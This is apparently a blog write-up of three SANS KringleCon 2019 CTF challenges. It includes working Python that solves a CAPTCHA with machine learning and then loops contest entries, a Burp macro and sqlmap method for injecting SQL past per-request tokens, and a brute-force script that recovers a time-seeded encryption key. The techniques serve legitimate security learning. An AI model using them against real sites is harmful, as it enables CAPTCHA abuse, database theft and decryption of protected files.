Monday, January 13, 2020

SANS Holiday Hack Challenge: KringleCon 2019

This was the first year I participated in KringleCon, and I was really impressed with how well made it was. With a variety of challenges exploring different aspects of information security, spanning both penetration testing and blue team techniques across a range of difficulties, it made for a CTF event that was accessible to all. Paired with really great resources and materials for each challenge, the whole event was excellent.



Due to the bustle of the holidays and closing out the year, I originally didn't plan on participating, but a friend asked for some help on one of the challenges, and after that I couldn't stop. I was hooked and had to keep solving.

This blog entry isn't a full write-up of all the great challenges; it covers only a few of the more complicated ones that I enjoyed the most.

Objective 8 - Machines can also learn to be an Elf - Machine Learning to Bypass a CAPTCHA


I loved this challenge because it taught me something genuinely new; my knowledge of machine learning was extremely limited going in.

We need to submit our entry for a chance to win some free cookies, but we are presented with a CAPTCHA that asks us to identify three different kinds of items within a time frame of 5 seconds, which is not humanly possible.



Enter machine learning and TensorFlow! Resources were provided with the challenge to give a bit of background knowledge on this topic.


Additionally, the challenge gives us an archive of 12,000 images, separated into categories by image type, as well as a Python script to get us started. All of the necessary tools are provided; it's up to us to train the model and code up the logic to bypass the actual CAPTCHA.

First, we need to use the "retrain.py" script included in the GitHub repo to train the model to recognize each of the different categories of images. To do this, we just point the script at the directory that contains all 12,000 images and let it run.
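The exact paths will vary, but the invocation is along these lines, assuming the image archive was extracted to a training_images directory (--image_dir is the flag TensorFlow's retrain.py uses to locate its training data):

python3 retrain.py --image_dir ./training_images/

Output will look similar to the following: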



Next, I modified some of the code in the repo so I could import it as a library, and then extended the half-completed script that was provided: it quickly saves all of the generated CAPTCHA images to a directory, then calls the library to analyze and predict what each image is.

poketrainer.py
#!/usr/bin/python3
# Image Recognition Using TensorFlow Example.
# Code based on example at:
# https://raw.githubusercontent.com/tensorflow/tensorflow/master/tensorflow/examples/label_image/label_image.py
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time
import sys

# sudo apt install python3-pip
# sudo python3 -m pip install --upgrade pip
# sudo python3 -m pip install --upgrade setuptools
# sudo python3 -m pip install --upgrade tensorflow==1.15

def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put({'img_full_path': img_full_path, 'prediction': labels[prediction].title(), 'percent': results[prediction]})

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png(imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

def predict(requested_type):
    # Load the trained machine learning model created by running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")
    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)
    # Use queues and threading to speed up the processing
    q = queue.Queue()
    unknown_images_dir = 'unknown_images'
    unknown_images = os.listdir(unknown_images_dir)
    # Iterate over each of our images
    for image in unknown_images:
        img_full_path = '{}/{}'.format(unknown_images_dir, image)
        print('Processing Image {}'.format(img_full_path))
        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) > 10:
            time.sleep(0.0001)
        # predict_image expects PNG image bytes, so we read the image as 'rb' to get a bytes object
        image_bytes = open(img_full_path, 'rb').read()
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation)).start()
    print('Waiting For Threads to Finish...')
    while q.qsize() < len(unknown_images):
        time.sleep(0.001)
    # Get a list of all threads' returned results
    prediction_results = [q.get() for x in range(q.qsize())]
    # Keep only the images whose predicted type is one of the requested types
    the_types = requested_type
    final_answers = []
    for prediction in prediction_results:
        result = '{img_full_path}'.format(**prediction)
        the_prediction = '{prediction}'.format(**prediction)
        if the_prediction in the_types:
            # result[15:51] slices 'unknown_images/<uuid>.png' down to the 36-character UUID
            final_answers.append(result[15:51])
    print(final_answers)
    return final_answers


capteha_api.py
#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import os
import base64
import poketrainer

def main():
    yourREALemailAddress = "REAL EMAIL ADDRESS HERE"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']  # A list of dictionaries, each containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')  # The image types the CAPTEHA challenge is looking for
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ', '').strip()]  # cleaning and formatting
    print(challenge_image_types)

    # Save each unknown image to disk so poketrainer can classify it
    os.makedirs('unknown_images', exist_ok=True)
    for mystery in b64_images:
        with open('unknown_images/' + mystery['uuid'] + '.png', 'wb') as f:
            f.write(base64.b64decode(mystery['base64']))

    correct_answers = poketrainer.predict(challenge_image_types)
    print(correct_answers)
    final_answer = ','.join(correct_answers)

    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer': final_answer}).text)
    if not json_resp['request']:
        # If it fails, just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get here, we are successful and can submit a bunch of entries until we win
    userinfo = {
        'name': 'Krampus Hollyfeld',
        'email': yourREALemailAddress,
        'age': 180,
        'about': "Cause they're so flippin yummy!",
        'favorites': 'thickmints'
    }
    # If we win the once-per-minute drawing, it will tell us we were emailed.
    # Should take no more than 200 entries before we win. If more, something's wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)

if __name__ == "__main__":
    main()


All of the UUIDs of the predicted images are stored in a list and then submitted in a POST request as the CAPTCHA solution. I likely could have made improvements to the script to speed it up, but it ended up working nicely as-is.


An email is then sent to the address you added to the script, which gives the flag:


Objective 9 - Sleighing the DB Blind - SQL Injection to Retrieve the Data



Based on the objective text, it's quite obvious that SQL injection is going to be the key here. We're presented with a web page that contains a form for submitting university applications.



However, looking at the requests that take place, before every request to the backend, the "validator.php" endpoint is called and a unique time-based token is generated, which must be used immediately. Because of this, we need to ensure a fresh token is generated and placed into each SQL injection payload so the request is processed.





There are two ways to do this: a custom sqlmap tamper script or Burp Suite macros. I decided to just let Burp handle everything, but in either case, sqlmap is going to do all the heavy lifting once the token handling is in place.
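For the tamper-script route, a rough sketch is below. This is only an outline under assumptions, not what I actually ran: the validator URL and the token parameter name are placeholders, and I'm assuming the token can simply be fetched and appended to each payload. The __priority__/tamper() structure is sqlmap's standard tamper interface.

# token_tamper.py - hypothetical sqlmap tamper script sketch
import requests
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    # Grab a fresh time-based token and append it to the injected data
    # (URL and parameter name are assumptions for illustration)
    token = requests.get("https://<target>/validator.php").text
    return "{}&token={}".format(payload, token)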

First, I confirmed that SQL injection was possible by sending some apostrophes in the form data.





This error shows us that input placed into the name field is not sanitized and is used as-is, which means we can inject arbitrary SQL queries. Now we just need to set up a Burp macro and session handling rule so we can drive everything through sqlmap. This is accomplished via the following steps:

Project options > Sessions tab > Macros > Add

From within the Macro Editor, the request to validator.php can be selected from the proxy history.


The Configure Item option can then be selected, and a custom parameter can be defined.


Back in the Sessions tab under Session Handling Rules, a new rule can be added, and the rule can be set to run the macro that was just created.


The options when selecting the macro should look like the following:


The scope of this rule can then be modified to include the proxy.



Now all that needs to be done is to point sqlmap at the Burp proxy, and the token generation will be handled automagically, allowing our sqlmap payloads to get through.
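As a sketch, the invocation looks something like the following, assuming the intercepted application request was saved to a file (the file name is illustrative, and the proxy address is Burp's default listener):

sqlmap -r application.req --proxy="http://127.0.0.1:8080" --dump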



Letting this run, we can dump the entire database, where we discover the "krampus" table containing various "path" values that point to PNG images.




Browsing to these PNGs gives the answer to the objective: Super Sled-o-matic









Objective 10 - Elfscrow Inside and Out: Reversing and Crypto




The objective provides a Windows binary, a PDB file, and an encrypted PDF file. The goal is to analyze the binary and determine how to break the cryptography. A resource given with the objective was very well made for learning more about this topic.


To start off, I ran the executable to determine how it's used.




There is an insecure mode with some text hinting at weaknesses, and it appears we need an ID in order to perform the decryption. As a test, I tried encrypting a file.



The output gives a seed value, a key, and an ID. After this, I loaded the binary and the PDB into IDA to explore what is happening. From the main function we have paths to both the encrypt and decrypt functions. Exploring the "do_decrypt" function, we can see that it starts by performing an internet connection check and then reaches out to the server to try to grab the key. We'll come back to this; the more important aspect is how the file gets encrypted.



Following the "do_encrypt" function, we can see that the seed is generated from the time function, which returns an epoch timestamp based on our system time.


Following this further into "super_secure_random", we can see exactly how the key is generated. It takes the state, which starts as our seed (the epoch timestamp), multiplies it by 214013, adds 2531011, shifts the result right by 16 bits, and then ANDs it with 0x7FFF; the low byte of each iteration becomes the next byte of the key. Using this, we can generate the key ourselves if we know the seed.
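As a minimal Python sketch of that routine (assuming the binary's 32-bit unsigned arithmetic), one step of the generator looks like this:

def super_secure_random(state):
    # state = state * 214013 + 2531011 (mod 2^32); output is bits 16..30 of the new state
    state = (214013 * state + 2531011) & 0xFFFFFFFF
    return state, (state >> 16) & 0x7FFF

Each call advances the state and yields a value whose low byte becomes the next byte of the key.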


Looking at the other functions present, we can also see two different API calls being made. When encrypting, a call to "/api/store" is made, which stores the encryption key on the remote server.


Additionally, when decrypting, a call to "/api/retrieve" is made, which uses the ID value to retrieve a stored encryption key from the server.




Capturing the traffic with Wireshark, you can see that this only stores and retrieves the key, and the ID is not actually necessary to perform the decryption.

As mentioned previously, the seed is generated from an epoch timestamp. Since the objective text provides a clue that the encryption took place within a certain window of time, it is possible to brute force the decryption by generating keys for that entire time range.
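The seed range in the script below corresponds to that window. Assuming the hinted window was 7 PM to 9 PM UTC on December 6, 2019 (which is what the script's seed values work out to), the epoch bounds can be derived like so:

from datetime import datetime, timezone

seed_start = int(datetime(2019, 12, 6, 19, 0, tzinfo=timezone.utc).timestamp())      # 1575658800
seed_stop = int(datetime(2019, 12, 6, 21, 0, tzinfo=timezone.utc).timestamp()) + 1   # 1575666001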

I decided to put together a script that loops through the time range generating keys, and then uses the binary itself to do the heavy lifting for the decryption; however, as seen in the output earlier, the binary expects an ID, not a key. My initial thought was to take each generated key, make an API call to store it, and then use the returned ID as the argument to decrypt. However, I noticed that this generated a lot of false positives, along with other issues.

Crypto-wise, I knew the ID wasn't really needed to decrypt, but there was that internet check: if the internet was not up, the binary would terminate. To overcome this and speed up the decryption process, I spun up a local Python server listening on localhost and modified my hosts file so any requests to the actual API would hit my server instead. The Python server just reflects whatever is sent to it, which bypasses the internet check and lets the binary decrypt using the key that is reflected back as the ID.
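The hosts redirection is a one-line change; the hostname below is a placeholder for whatever API host the binary actually resolves:

# C:\Windows\System32\drivers\etc\hosts (or /etc/hosts on Linux)
127.0.0.1    <elfscrow API hostname>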

The following is the script used for the decryption:
import requests
import subprocess

store = "http://127.0.0.1/api/store"
retrieve = "http://127.0.0.1/api/retrieve"
seed_start = 1575658800
seed_stop = 1575666001

def generate_key(seed):
    # Re-implementation of super_secure_random: derive 8 key bytes from the seed
    state = seed
    key = ""
    for i in range(8):
        state = 214013 * state + 2531011
        rand = (state >> 16) & 0x7FFF
        part = hex(rand & 0xFF).replace('0x', '')
        key += "{num:0>2}".format(num=part)  # zero-pad each byte to two hex digits
    print(key)
    return key

def store_key(url, key):
    useragent = {"User-Agent": "Elfscrow 1.0 (SantaBrowse Compatible)"}
    r = requests.post(store, data=key, headers=useragent)
    id = r.content
    return id

def retrieve_key(url, id):
    useragent = {"User-Agent": "Elfscrow 1.0 (SantaBrowse Compatible)"}
    r = requests.post(retrieve, data=id, headers=useragent)
    key = r.content
    return key

def exec_cmd(cmd):
    ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    output = ps.communicate()[0]
    print(output)
    return str(output)

def main():
    attempt = 0
    for i in range(seed_start, seed_stop, 1):
        print("------Attempt ", attempt, "--------")
        possible_key = generate_key(i)
        print("Time: ", i)
        print("Key: ", possible_key)
        # The local reflection server echoes the key back as the "ID"
        possible_id = store_key(store, possible_key)
        print("ID: ", possible_id.decode('utf-8'))
        attempt += 1
        cmd = f"elfscrow.exe --decrypt --id {possible_id.decode('utf-8')} ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc {possible_id.decode('utf-8')}.pdf --insecure"
        print(cmd)
        decrypt = exec_cmd(cmd)
        if "Uh oh" in decrypt:
            continue
        else:
            print("Valid ID discovered! - ", possible_id.decode('utf-8'))
            continue

if __name__ == "__main__":
    main()


Example Python server to respond to the API requests:
from http.server import HTTPServer, BaseHTTPRequestHandler
from io import BytesIO

class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'Hello, world!')

    def do_POST(self):
        # Reflect the POST body straight back: a stored key is returned as the
        # "ID", and a retrieved "ID" is returned as the key
        content_length = int(self.headers['Content-Length'])
        body = self.rfile.read(content_length)
        self.send_response(200)
        self.end_headers()
        response = BytesIO()
        response.write(body)
        self.wfile.write(response.getvalue())

httpd = HTTPServer(('localhost', 80), SimpleHTTPRequestHandler)
httpd.serve_forever()


Running this takes a little while, and there were a lot of false positive decryptions. However, by setting up a monitoring script, or just using the "file" command to keep an eye on things, we eventually find that a valid decryption took place. Corrupted files are identified as just "data", while our valid decryption shows up as an actual PDF file.
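For example, a quick pass with "file" makes the winner stand out (output shown is illustrative):

$ file *.pdf | grep -v ': data'
<winning-id>.pdf: PDF document, version 1.3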



Now we know that the file was encrypted on Friday, December 6, 2019 at 8:20:49 PM GMT.
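As a sanity check, that timestamp converts to an epoch seed squarely inside the brute-forced range:

from datetime import datetime, timezone

seed = int(datetime(2019, 12, 6, 20, 20, 49, tzinfo=timezone.utc).timestamp())
print(seed)  # 1575663649 - between seed_start (1575658800) and seed_stop (1575666001)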

Opening up the decrypted PDF, we find the answer to the objective:












